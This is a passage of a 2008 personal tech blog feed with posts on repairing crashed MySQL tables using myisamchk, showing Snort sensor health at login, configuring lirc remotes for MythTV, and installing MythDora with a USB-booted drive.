id="SPELLING_ERROR_7">mysqldump</span>: Error 1194: Table 'watchdog' is marked as crashed and should be repaired when dumping table `watchdog` at row: 283</span><br /><br /><span style="font-family:courier new;"><span class="blsp-spelling-error" id="SPELLING_ERROR_8">mysqldump</span>: Got error: 145: Table './drupal/watchdog' is marked as crashed and should be repaired when using LOCK TABLES</span><br /><br /><span style="font-family:courier new;"><span class="blsp-spelling-error" id="SPELLING_ERROR_9">mysqldump</span>: Got error: 145: Table './gallery2/g2_CacheMap' is marked as crashed and should be repaired when using LOCK TABLES</span><br /><br /><span style="font-family:Courier New;"></span><br /><br /><span style="font-size:+0;">Google quickly found the following post: <a href="http://gallery.menalto.com/node/72721">http://gallery.menalto.com/node/72721</a>, where a user kindly posted the solution to their own problem: </span><br /><br /><br /><br /><span style="font-family:arial;font-size:85%;">Stage 1: Checking your <span class="blsp-spelling-error" id="SPELLING_ERROR_10">tablesRun</span> <span class="blsp-spelling-error" id="SPELLING_ERROR_11">myisamchk</span> *.<span class="blsp-spelling-error" id="SPELLING_ERROR_12">MYI</span> or <span class="blsp-spelling-error" id="SPELLING_ERROR_13">myisamchk</span> -e *.<span class="blsp-spelling-error" id="SPELLING_ERROR_14">MYI</span> if you have more time. Use the -s (silent) option to suppress unnecessary information.If the <span class="blsp-spelling-error" id="SPELLING_ERROR_15">mysqld</span> server is stopped, you should use the --update-state option to tell <span class="blsp-spelling-error" id="SPELLING_ERROR_16">myisamchk</span> to mark the table as “checked.”You have to repair only those tables for which <span class="blsp-spelling-error" id="SPELLING_ERROR_17">myisamchk</span> announces an error. For such tables, proceed to Stage 2.If you get unexpected errors when checking (such as out of memory errors), or if <span class="blsp-spelling-error" id="SPELLING_ERROR_18">myisamchk</span> crashes, go to Stage 3.<br />Stage 2: Easy safe <span class="blsp-spelling-error" id="SPELLING_ERROR_19">repairFirst</span>, try <span class="blsp-spelling-error" id="SPELLING_ERROR_20">myisamchk</span> -r -q <span class="blsp-spelling-error" id="SPELLING_ERROR_21">tbl</span>_name (-r -q means “quick recovery mode”). This attempts to repair the index file without touching the data file. If the data file contains everything that it should and the delete links point at the correct locations within the data file, this should work, and the table is fixed.source: </span><a class="bb-url" href="http://dev.mysql.com/doc/refman/5.0/en/repair.html" rel="nofollow"><span style="font-family:arial;font-size:85%;">Website</span></a><br /><br /><br /><br /><span style="font-family:courier new;">[root@www storage]# <strong><span class="blsp-spelling-error" id="SPELLING_ERROR_22">myisamchk</span> -r -q /var/lib/<span class="blsp-spelling-error" id="SPELLING_ERROR_23">mysql</span>/<span class="blsp-spelling-error" id="SPELLING_ERROR_24">drupal</span>/watchdog.<span class="blsp-spelling-error" id="SPELLING_ERROR_25">MYI</span></strong></span><br /><br /><span style="font-family:courier new;">- check record delete-chain</span><br /><br /><span style="font-family:courier new;">- recovering (with sort) <span class="blsp-spelling-error" id="SPELLING_ERROR_26">MyISAM</span>-table '/var/lib/<span class="blsp-spelling-error" id="SPELLING_ERROR_27">mysql</span>/<span class="blsp-spelling-error" id="SPELLING_ERROR_28">drupal</span>/watchdog.<span class="blsp-spelling-error" id="SPELLING_ERROR_29">MYI'Data</span> records: 513</span><br /><br /><span style="font-family:courier new;">- Fixing index 1</span><br /><br /><span style="font-family:courier new;">Found block that points outside data file at 122592</span><br /><br /><span style="font-family:courier new;"><span class="blsp-spelling-error" id="SPELLING_ERROR_30">MyISAM</span>-table '/var/lib/<span class="blsp-spelling-error" id="SPELLING_ERROR_31">mysql</span>/<span class="blsp-spelling-error" id="SPELLING_ERROR_32">drupal</span>/watchdog.<span class="blsp-spelling-error" id="SPELLING_ERROR_33">MYI</span>' is not fixed because of errors</span><br /><br /><span style="font-family:courier new;">Try fixing it by using the --safe-recover (-o), the --force (-f) option or by not using the --quick (-q) flag</span><br /><br /><span style="font-family:courier new;">[root@www storage]# <strong><span class="blsp-spelling-error" id="SPELLING_ERROR_34">myisamchk</span> -r /var/lib/<span class="blsp-spelling-error" id="SPELLING_ERROR_35">mysql</span>/<span class="blsp-spelling-error" id="SPELLING_ERROR_36">drupal</span>/watchdog.<span class="blsp-spelling-error" id="SPELLING_ERROR_37">MYI</span></strong></span><br /><br /><span style="font-family:courier new;">- recovering (with sort) </span><br /><br /><span style="font-family:courier new;"><span class="blsp-spelling-error" id="SPELLING_ERROR_38">MyISAM</span>-table '/var/lib/<span class="blsp-spelling-error" id="SPELLING_ERROR_39">mysql</span>/<span class="blsp-spelling-error" id="SPELLING_ERROR_40">drupal</span>/watchdog.<span class="blsp-spelling-error" id="SPELLING_ERROR_41">MYI</span>'</span><br /><br /><span style="font-family:courier new;">Data records: 513</span><br /><br /><span style="font-family:courier new;">- Fixing index 1</span><br /><br /><span style="font-family:courier new;">Found block that points outside data file at 122592</span><br /><br /><span style="font-family:courier new;">- Fixing index 2</span><br /><br /><br /><br />As you can see, I had to get rid of the -q option to get it to work, but it did in fact work. Same <span class="blsp-spelling-corrected" id="SPELLING_ERROR_42">command</span> worked to fix g2_<span class="blsp-spelling-error" id="SPELLING_ERROR_43">CasheMap</span>, but that one took quite a bit longer.<br /><br /><br />Looks like that did the trick.Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com3tag:blogger.com,1999:blog-5890567984672491244.post-11862669803225365182008-06-06T13:14:00.005-04:002008-06-11T21:10:47.080-04:00Some snort login kung-fu...<div align="left">I was recently playing around with my .bash_profile file looking for new ways to alert myself as well as my team to problems with production snorts. I ended up with two little tricks that I have found really useful and I figured I would share.<br /><br />For those that don't know, the .bash_profile file is an sh script that runs at user login. At a bare minimum it sets the users PATH, but it can be used for a whole lot more. It's located in the root of the users home directory. Ex: /home/snort/.bash_profile, or /root/.bash_profile<br /><br />Before I go any further I will tell you that both of these tricks are obviously reactive in nature. They only let you know there is a problem the next time you log into the device. A more proactive solution would involve setting thresholds and sending emails to admins, but 1) there are already plenty of scripts that do that, and 2) that is not a luxury I have on my sensors. I have inbound ssh, outbound 80 for updates and outbound 443 for logging.<br /><br />Nevertheless, this reactive approach is much cooler than nothing at all and I think it would still be helpful on any snort installation no matter what other active health monitoring is in place.<br /><br /><strong><span style="font-size:130%;">Display most recent snort signatures on login</span></strong></div><strong></strong><div align="left"><br />The first function I added to .bash_profile is called checksnortsigs(). It sorts the files in /etc/snort/rules by date order, and grabs the date of the most recent .rules file. It's that simple. It then just prints that information when you log in and gives a little advice on what to do next:<br /><br /><span style="font-family:courier new;">checksnortsigs()<br />{<br />if [ -f /etc/init.d/snortd ]; then<br />LATESTRULE=`ls -ltr /etc/snort/rules/*.rules tail -1 awk '{print $6, $7}'`<br />echo "-------------- Snort Installation Detected -----------------"<br />echo "The most recent snort rules on this machine were updated on:"<br />echo " ******* $LATESTRULE *******"<br />echo "If the date above is more than 1 month old, run oinkmaster"<br />echo "manually and verify it completes without error."<br /></span><span style="font-family:courier new;">echo "------------------------------------------------------------"<br />echo<br />fi<br />}<br /><br />checksnortsigs</span><br /><br />Output (which is displayed as soon as the user logs in) looks like this:<br /><br /><span style="font-family:courier new;"><strong>Last login: Thu May 29 16:27:36 2008 from xxxxxxxx<br />-------------- Snort Installation Detected -----------------<br />The most recent snort rules on this machine were updated on:<br />******* May 30 *******<br />If the date above is more than 1 month old, run oinkmaster<br />manually and verify it completes without error.<br />------------------------------------------------------------<br /></strong></span><br /></div><div align="left"><strong><span style="font-size:130%;">Display % dropped packets and Mbps stats on login</span></strong></div><div align="left"><br />Shortly after that, and this came to me after playing around with sguil and seeing how nicely the snort.stats information is integrated into the analyst console, I decided that I also wanted to display recent % dropped packets and Mbps statistics each time someone logged in. There are a few more steps to get this one working, but they are all very easy:<br /><br />1) Enable the following line in snort.conf:<br /><br /><span style="font-family:courier new;">preprocessor perfmonitor: time 300 file /var/log/snort/snort.stats pktcnt 10000</span><br /><br />2) Restart snort<br /><br />3) I created a very simple bash script that is basically one line of code along with a bit of "usage" code to make it easier for others to run. I called it get-snort-stats.sh. I created it for the bash_profile script, but it can be used as a standalone program at all. Here it is:<br /><br /><span style="font-family:courier new;">#!/bin/bash</span><br /><span style="font-family:courier new;"># A very simple utility that will display the % dropped packets as well as throughput statistics.</span><br /><span style="font-family:courier new;"># Snort records this information every 5 minutes</span><br /><span style="font-family:courier new;"># Author: Seth Art</span><br /><span style="font-family:courier new;"># Created: May 20th, 2008</span><br /><br /><span style="font-family:courier new;">########################### </span><br /><span style="font-family:courier new;">#Usage</span><br /><span style="font-family:courier new;">###########################<br />if [ -z $1 ]; then </span><br /><span style="font-family:courier new;">echo </span><br /><span style="font-family:courier new;">echo "Usage: get-snort-stats [number of lines to display]..." </span><br /><span style="font-family:courier new;">echo exit</span><br /><span style="font-family:courier new;">fi<br /></span><br /><span style="font-family:courier new;">case $1 in</span><br /><span style="font-family:courier new;">'-h''--help')</span><br /><span style="font-family:courier new;">echo</span><br /><span style="font-family:courier new;">echo "Usage: get-snort-stats [number of lines to display]..."</span><br /><span style="font-family:courier new;">echo " -h, --help display this help and exit"</span><br /><span style="font-family:courier new;">echo</span><br /><span style="font-family:courier new;">exit 1</span><br /><span style="font-family:courier new;">;;esac</span><br /><br /><span style="font-family:courier new;">########################### </span><br /><span style="font-family:courier new;">#Main</span><br /><span style="font-family:courier new;">###########################<br />tail -$1 /var/log/snort/snort.stats awk -F , '{print "Dropped Packets = " $2, "\t", "Mbps = "$3}'<br /></span><br /><br /><br />4) This bit ties the get-snort-stats command in with the .bash_profile script. Add the following function to .bash_profile<br /><br /><span style="font-family:courier new;">getsnortstats()<br />{<br />if [ -f /etc/init.d/snortd ]; then<br />echo "------------------------------------------------------------"<br />echo" Snort % Pkts dropped and mbits/sec for the last 20 minutes "<br />/usr/local/bin/get-snort-stats.sh 4<br />echo "------------------------------------------------------------"<br />fi<br />}<br /></span><br />5) Add the call to the getsnortstats() function right below the checksnortsigs() fucntion call in bash_profile:<br /><br /><span style="font-family:courier new;">checksnortsigs<br />getsnortstats</span><br /><br />5) Now I'm positive there is a better way to do this, but to make sure the snort.stats file doesn't grow out of control I simply put a line that rm's snort.stats every night in the same script I ued to run oinkmaster, recreate sig-msg.map, and restart snort. Not the most elegant solution I know, but it works...<br /><br />When all is said and done, you should see the following information when you log in from now on:<br /><br /><strong><span style="font-family:courier new;">Last login: Thu May 29 16:27:36 2008 from xxxxxxxx </span><br /><span style="font-family:courier new;">-------------- Snort Installation Detected ----------------- </span><br /><span style="font-family:courier new;">The most recent snort rules on this machine were updated on: </span><br /><span style="font-family:courier new;">******* May 30 ******* </span><br /><span style="font-family:courier new;">If the date above is more than 1 month old, run oinkmaster </span><br /><span style="font-family:courier new;">manually and verify it completes without error. </span><br /></strong><strong><span style="font-family:courier new;">------------------------------------------------------------<br />------------------------------------------------------------</span><br /><span style="font-family:courier new;">Snort % Pkts dropped and mbits/sec for the last 20 minutes</span><br /><span style="font-family:courier new;">Dropped Packets = 0.000 Mbps = 4.672</span><br /><span style="font-family:courier new;">Dropped Packets = 0.000 Mbps = 4.796</span><br /><span style="font-family:courier new;">Dropped Packets = 0.000 Mbps = 4.369</span><br /><span style="font-family:courier new;">Dropped Packets = 0.000 Mbps = 5.071</span><br /></strong><span style="font-family:courier new;"><strong>------------------------------------------------------------<br /></strong></span><br />Enjoy :) </div>Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com4tag:blogger.com,1999:blog-5890567984672491244.post-48175729445415927892008-02-18T12:34:00.005-05:002008-02-18T15:25:36.209-05:00MythTV Upgrade - Part 2<strong>Configuring lirc (Remote control daemon)</strong><br /><br />Getting the remote control to work has been on my to-do list for as long as I've been using MythTV. Early on I decided to go with a wireless mouse/keyboard combo instead. I have been using the <a href="http://ione-usa.com/index.php?page=shop.product_details&flypage=shop.flypage&product_id=46&category_id=403aa782a4283038673984497e941106&option=com_phpshop&Itemid=1">Ione Scorpius P-20</a> for quite a while and it has served me well.<br /><br /><br /><br /><img id="BLOGGER_PHOTO_ID_5168376986593672082" style="DISPLAY: block; MARGIN: 0px auto 10px; CURSOR: hand; TEXT-ALIGN: center" height="124" alt="" src="http://4.bp.blogspot.com/_CunbzMFsEf0/R7nDfG84O5I/AAAAAAAAABI/9xpUk4bSCII/s200/1508ab6e0ef5b76c8fa615387a97104d.jpg" width="176" border="0" /><br /><br />Every 6 months or so I would try to get the remote working, and every time I would fail... until this weekend. I couldn’t have done it without the following two sites:<br /><br />1) <a href="http://www.mythtv.org/wiki/index.php/MCE_Remote">http://www.mythtv.org/wiki/index.php/MCE_Remote</a><br />2) <a href="http://www.hauppauge.co.uk/board/showthread.php?t=8048">http://www.hauppauge.co.uk/board/showthread.php?t=8048</a><br /><br /><a href="http://2.bp.blogspot.com/_CunbzMFsEf0/R7nbKm84O6I/AAAAAAAAABQ/8yOyacEiuPw/s1600-h/Mce-hauppauge.jpg"><img id="BLOGGER_PHOTO_ID_5168403022685420450" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; CURSOR: hand" alt="" src="http://2.bp.blogspot.com/_CunbzMFsEf0/R7nbKm84O6I/AAAAAAAAABQ/8yOyacEiuPw/s200/Mce-hauppauge.jpg" border="0" /></a><br />I have a Hauppauge PVR-150 Tuner card which came with the Remote and the IR receiver. I would say my biggest stumbling point along the way was that until this weekend I never knew exactly which remote I had. Apparently the PVR-150 has come with a whole bunch of different remotes over its lifetime.<br /><br /><br /><br />As it turns out, I have a MCE USB2, Version 2, Hauppauge PVR-Kit remote. How I was supposed to know that without luckily finding that first link, I have no idea. A picture truly is worth a thousand words sometimes. The only identifying number on the back was "RC 6" ir.<br /><br />So now on to the configuration:<br /><br />MythDora4 comes with lircd version 0.8.2-CVS:<br /><br /><span style="font-size:85%;"><span style="font-family:courier new;">[root@mythtv mythtv]# /usr/sbin/lircd -v<br />lircd 0.8.2-CVS</span><br /></span><br />After reading a bunch of caveats on the MythTV.org wiki link above, I decided to use CVS and go right to the latest version.<br /><br />I following the wiki instructions exactly:<br /><br /><span style="font-size:85%;"><span style="font-family:courier new;">407 cd /usr/src<br />408 cvs -d:pserver:anonymous@lirc.cvs.sourceforge.net:/cvsroot/lirc login<br />409 cvs -z8 -d:pserver:anonymous@lirc.cvs.sourceforge.net:/cvsroot/lirc co lirc<br />410 cd lirc<br />411 ls<br />412 ./autogen.sh<br />413 ./setup.sh</span><br /></span>Menu Option # (1) - Driver Configuration (enter)<br />Menu Option # (8) - USB Devices (enter)<br />Menu Option # (t) - Windows Media Center Remotes (new version, Philips et al.) (enter)<br />Menu Option # (3) - Save your configuration and run configure (enter)<br /><span style="font-family:courier new;font-size:85%;">418 make && make install<br />419 modprobe lirc_mceusb2</span><br /><br />This installed lircd in /usr/local/sbin/lircd (This will be important later). First I used mode2 to see if the IR receiver was working:<br /><br /><br /><span style="font-family:courier new;font-size:85%;">[root@mythtv lirc]# mode2</span><br /><span style="font-family:courier new;font-size:85%;">(I then pressed the up arrow on the remote)</span><br /><span style="font-family:courier new;font-size:85%;">space 100000</span><br /><span style="font-family:courier new;font-size:85%;">pulse 2750</span><br /><span style="font-family:courier new;font-size:85%;">space 750</span><br /><span style="font-family:courier new;font-size:85%;">pulse 500</span><br /><span style="font-family:courier new;font-size:85%;">space 400</span><br /><span style="font-family:courier new;font-size:85%;">pulse 500</span><br /><span style="font-family:courier new;font-size:85%;">space 350</span><br /><span style="font-family:courier new;font-size:85%;"></span><br /><br /><snip>- That output means it was catching the signals<br /><br />Unfortunately when I started lircd, ran irw, and then pressed the same buttons, nothing showed up:<br /><br /><span style="font-family:courier new;font-size:85%;">[root@mythtv lirc]# /usr/local/sbin/lircd /etc/lircd.conf</span><br /><span style="font-family:courier new;font-size:85%;">[root@mythtv lirc]# irw</span><br /><br />I tried a few pre-made lircd.conf files online, but the one from that second link is what finally worked. The lircd.conf file is what maps the IR code to a button on your remote. It looks something like this:<br /><br /><span style="font-family:courier new;font-size:85%;">Power 0x00007bf3 # no e2,e3<br />MyTV 0x00007bb9 # starts at af<br />MyMusic 0x00007bb8 # starts at af<br />MyPictures 0x00007bb6 # starts at af<br />MyVideos 0x00007bb5 # starts at af<br />Record 0x00007be8 # no e2,e3<br />Stop 0x00007be6 # no e2,e3<br />Pause 0x00007be7 # no e2,e3<br /><snip></span><br /><br />This time, when I run irw i see the following output:<br /><br /><span style="font-family:courier new;"><span style="font-size:85%;">[root@mythtv lirc]# lircd /etc/lircd.conf</span><br /></span><span style="font-family:courier new;font-size:85%;">[root@mythtv lirc]# irw<br />000000037ff07be1 00 Up mceusb<br />000000037ff07be0 00 Down mceusb<br />000000037ff07bdf 00 Left mceusb<br />000000037ff07bde 00 Right mceusb<br />000000037ff07bfa 00 Five mceusb<br />000000037ff07bf9 01 Six mceusb<br /></span><br />That is farther then I have ever been before. Now the last part is the .lircrc file. This file maps the named button to the program and action (or keystroke) and is located in the users home directory. (ex: /home/mythtv/.lircrc)<br /><br />To review:<br /><br />Lircd.conf -> Maps IR code to a button name on remote<br />.lircrc -> Maps the button on the remote to a corresponding keystroke (application dependent).<br /><br />An excerpt of the .lircrc file looks something like this:<br /><br /><span style="font-family:courier new;font-size:85%;"># Down = Scroll/Channel Down.<br />begin<br />prog = mythtv<br />button = Down<br />config = Down<br />repeat = 2<br />end<br /><snip></span><br />This tells us that when (according to lircd.conf) the down button is pressed, if we are in mythtv, this should be equivalent to the down arrow.<br /><br />I then started lircd with my new lircd.conf and .lircrc files in place:<br /><span style="font-family:courier new;">[root@mythtv lirc]# lircd /etc/lircd.conf</span><br /><br />And with that my remote control worked with MythTV for the first time ever.<br /><br />The last thing I did was to change the /etc/rc.d/init.d/lircd file so that the service script starts my newly compiled lircd .0.8.3-CVS rather than the stock lircd.<br /><br /><span style="font-family:georgia;">Just to reiterate which version is which:</span><br /><span style="font-family:courier new;font-size:85%;"></span><br /><span style="font-family:courier new;font-size:85%;">[root@mythtv mythtv]# /usr/sbin/lircd -v</span><br /><span style="font-family:courier new;font-size:85%;">lircd 0.8.2-CVS<br />[root@mythtv lirc]#/usr/local/sbin/lircd -v<br />lircd 0.8.3-CVS<br /></span><br />I added the text in red to the following file: /etc/rc.d/init.d/lircd<br /><br /><span style="font-family:courier new;font-size:85%;">[ -x /usr/local/sbin/lircd ] exit 1<br />[ -x /usr/local/sbin/lircmd ] exit 1<br /><br />start(){<br />if [ -f /etc/lircd.conf ]; then<br />echo -n $"Starting infrared remote control daemon: "<br />daemon /usr/local/sbin/lircd $LIRCD_OPTIONS<br />RETVAL=$?<br />echo<br />fi<br /></span><br /><br />Troubleshooting:<br /><br />The licrd binary that came with MythDora4 wrote debug information to /var/log/messages. On the lircd I complied myself, it wrote message to /var/log/lircd. Tailing (with a -f) whichever log file lirc is writing to can be a really good way to troubleshoot.Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com0tag:blogger.com,1999:blog-5890567984672491244.post-48265704909160141952008-02-03T10:15:00.005-05:002008-02-16T14:37:34.899-05:00MythTV Upgrade - Part 1<strong>Introduction</strong><br /><br />I've been using <a href="http://www.mythtv.org/">MythTV</a> for about 3 years now, both on Fedora Core and also on Ubuntu on my laptop. My first MythTV system was built with A LOT of help from <a href="http://wilsonet.com/mythtv/fcmyth.php">Jarod Wilson's infamous How-To</a>. A few months ago I built two MythTV systems for my family and decided to use <a href="http://g-ding.tv/?q=MythDora">MythDora4</a>. It was so quick and easy that I decided to use MythDora for my own rebuild as well.<br /><br />I should start off by saying that I don’t use MythTV for the PVR functionality. I use it solely as a digital jukebox. I watch TV shows and movies using MythVideo, MythMusic is always a big hit at parties, and occasionally I use MythImage for slideshows.<br /><br />In the past I had all my media files on my WindowsXP box and used cifs to mount the windows shares on my MythTV box. I played music/videos directly through the share and performance was great even with a 10/100 Mbps NIC.<br /><br />For this iteration, I decided to also upgrade to a 1.5TB RAID5 array so that I could start burning all of my DVD's to .ISO files. This way I can browse through my entire DVD collection digitally.<br /><br />Lastly, I recently bought a Harmon/Kardon receiver and Polk Audio Center channel and Bookshelf speakers and slowly realized that I wasn’t going to be able to appreciate the new hardware unless I got digital audio working. (And yes… it is amazing)<br /><br />Below, are my notes, impressions, etc for the entire setup. I am going to put as much detail as possible so that if I ever have to do this again I have it all in one place.<br /><br /><br /><br /><strong>Hardware</strong><br /><strong></strong><br />Dell 8300 Tower, Dell BIOS A07<br />CPU: P4 2.8Ghz Hyperthreaded<br />Memory: 1.25Gb PC3200<br />Audio: M-Audio 5.1 Audio Card<br />Video: Nvidia GeForce 5200 AGP (VGA/DVI/SVIDIO)<br />Capture Card: Hauppauge PRV-150 Tuner Card<br />Network: 10/100/1000 Intel NIC<br />Storage:<br />(1) 40 GB HDD (IDE) (for the OS)<br />(2) 500GB IDE HDD's (for the RAID)<br />(2) 500GB SATA HDD's (for the RAID)<br /><br /><br /><strong>Configuring the OS</strong><br /><br />The install of the OS is really simple and extremely intuitive. The problems I ran into were caused by my additional disks, but were a result of a bug/lack of code/oversight/etc in the Dell BIOS. The motherboard has two IDE controllers, and two onboard SATA controllers. My buddies at work gave me the thumbs up on a RAID array that included two IDE and two SATA drives so that’s what I went ahead and did. I already had one 500 IDE, so I went and bought one more 500GB IDE and two 500GB SATA drives. This was good advice, and to fast forward, I did get it working, but Dell was not going to make it easy for me.<br /><br />After tons of research trying to prove that I wasn’t crazy, I confirmed that on this Dell 8300 BIOS, if you use either or both of the SATA controllers, the BIOS will only let you boot off a SATA drive. This means that if I installed the MBR (Master Boot Record) on one of my IDE drives, no matter what I did in the BIOS, I could not boot off of it. Most BIOS’s would obviously let you choose whichever disk you would like, but of course that would make too much sense.<br /><br />The most obvious option was to just install the MBR onto one of the SATA drives. However the whole point of using a separate system disk is that I want to make the RAID array and the OS completely independent of each other. If the disk that had the MBR on it died, I would be out of luck.<br /><br />A more elegant solution to this problem which was proposed by my coworker, is to instal the MBR on both of the SATA disks, so that if one died, the other one would just pick up, but like I mentioned earlier, I wanted to keep the RAID seperate.<br /><br />So what I finally decided to do was to install the MBR on a 128 MB USB disk. The end result is kind of a convoluted setup, but I think it’s a pretty cool solution. I like the cool factor that my machine won’t boot without that thumb drive in place, and of course this keeps my RAID array completely separate from the OS. Speaking of cool... I shortly found out that 5 drives in that stock Dell case was the farthest thing from it, but that will be a completely seperate article :)<br /><br />So back to the installation. While installing the OS I choose to make my own partitioning scheme, which looked like this:<br />/boot partition on sdc (the USB disk) using all 128MB<br />/boot1 partition on hda (100MB)<br />/ partition went to hda as well (my 40GB system disk).<br />For all three I used the ext3 filesystem.<br />swap went on hda as well (2048 GB)<br /><br />I then installed the OS, rebooted, and FINALLY saw that wonderful line “Grub loading… Please wait” or whatever it is.<br /><br />So for this first boot both phase I and II of the boot loader took place on the USB drive. To play around I wanted to also see if I could get the actual kernel to boot from the system disk rather than the USB disk. To do that I had to do the following:<br /><br />I edited the grub/grub.conf that was on the USB disk to look like this:<br /><br />default=0<br />timeout=5<br />splashimage=(hd0,0)/grub/splash.xpm.gz<br />hiddenmenu<br />title MythDora-hda (2.6.20-1.2944.fc6)<br /><strong>root (hd5,0)</strong><br />kernel /vmlinuz-2.6.20-1.2944.fc6 ro root=LABEL=/ rhgb quiet<br />initrd /initrd-2.6.20-1.2944.fc6.img<br />title MythDora-usb (2.6.20-1.2944.fc6)<br />root (hd0,0)<br />kernel /vmlinuz-2.6.20-1.2944.fc6 ro root=LABEL=/ rhgb quiet<br />initrd /initrd-2.6.20-1.2944.fc6.img<br /><br />I then copied the following files from /boot/ to /boot1:<br />config-2.6.20-1.2944.fc6<br />initrd-2.6.20-1.2944.fc6.img<br />symvers-2.6.20-1.2944.fc6.gz<br />vmlinuz-2.6.20-1.2944.fc6<br />System.map-2.6.20-1.2944.fc6<br /><br />I then edited /etc/fstab to look like this:<br /><br />LABEL=/ / ext3 defaults 1 1<br /><strong>/dev/hda1 /boot ext3 defaults 1 2</strong><br />Devpts /dev/pts devpts gid=5,mode=620 0 0<br />Tmpfs /dev/shm tmpfs defaults 0 0<br />Proc /proc proc defaults 0 0<br />Sysfs /sys sysfs defaults 0 0<br />LABEL=SWAP-hda2 swap swap defaults 0 0<br />/dev/cdrom /media/cdrom auto noauto,ro,user 0 0<br /><br /><br />Then I rebooted again. This time, grub still ran from the USB disk, but it looked at hd5,0 for the kernel, which on my machine is /dev/hda1. It found it and then mounted /dev/hda1 to /boot.<br /><br />I am not sure which is better: Leaving the entire boot partition on the USB drive, for using this phased approach; but this is the way I left it. Let me know if you think it makes a difference.<br /><br /><br />The only current problem with the actual OS (MythDora4) is that atrpms recently deprecated the FC6 package repository so updating the system is kind of at a standstill until the next version of MythDora comes out. Luckily, <a href="http://g-ding.tv/?q=content/what-were-working">http://g-ding.tv/?q=content/what-were-working</a>, shows that the next release based on Fedora Core 8 will be coming soon. They are just waiting on the release of version 0.21 of MythTV.<br /><br /><br />So I'll leave off with that. Parts two and three will include the following topics:<br /><br /><strong>Configuring the storage (RAID5 + XFS)<br />Configuring Digital Audio (S/PDIF over coax using alsa)<br /></strong><br />Still on the task list it to get the following working:<br /><br /><strong>Configuring LIRC (Remote control)<br />Configuring VGA to Component Video</strong>Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com0